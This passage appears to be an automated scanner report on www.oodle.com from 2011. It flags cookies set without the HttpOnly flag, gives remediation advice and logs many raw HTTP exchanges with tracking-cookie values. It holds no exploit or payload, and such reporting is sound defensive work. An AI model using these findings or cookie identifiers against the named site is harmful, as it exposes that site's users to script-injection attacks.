If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:46:31 GMT Connection: close Vary: Accept-Encoding Set-Cookie: otu=3d12132d80c3c544a5609c16de5eb5e0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=5c0593f4a30245fa5b12e2d4ff9a60c3; path=/; domain=.oodle.com Set-Cookie: a=dT1CNDk1N0FDODREODRCM0I3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM5MTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 55586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/-/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: http://www.oodle.com/browse/ Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:30 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMDt9; path=/; domain=.oodle.com Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /browse_redir/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: http://www.oodle.com/browse/ Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:31 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToyOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6InF1ZXJ5Ijt9aToxO2E6Njp7czozOiJsb2MiO3M6MTM6InVzYTp0eDpkYWxsYXMiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE4IjtzOjk6ImNpdHlfY29kZSI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJvcmlnaW4iO3M6NToiY2FjaGUiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/track-named/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: no-cache, no-store P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Expires: -1 Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:47:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQ0Nzt9; path=/; domain=.oodle.com Content-Length: 7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/about/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:55 GMT Content-Length: 20868 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA5NTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/help/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:18 GMT Content-Length: 23460 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExODt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/partner/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:29 GMT Content-Length: 21966 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyOTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/privacy/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:28 GMT Content-Length: 26885 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyODt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:49 GMT Content-Length: 21511 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA4OTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/terms/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyNDt9; path=/; domain=.oodle.com Content-Length: 38167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /message/no-script-warning/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:23 GMT Content-Length: 23391 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Mzt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pro/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:27 GMT Content-Length: 16929 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Nzt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
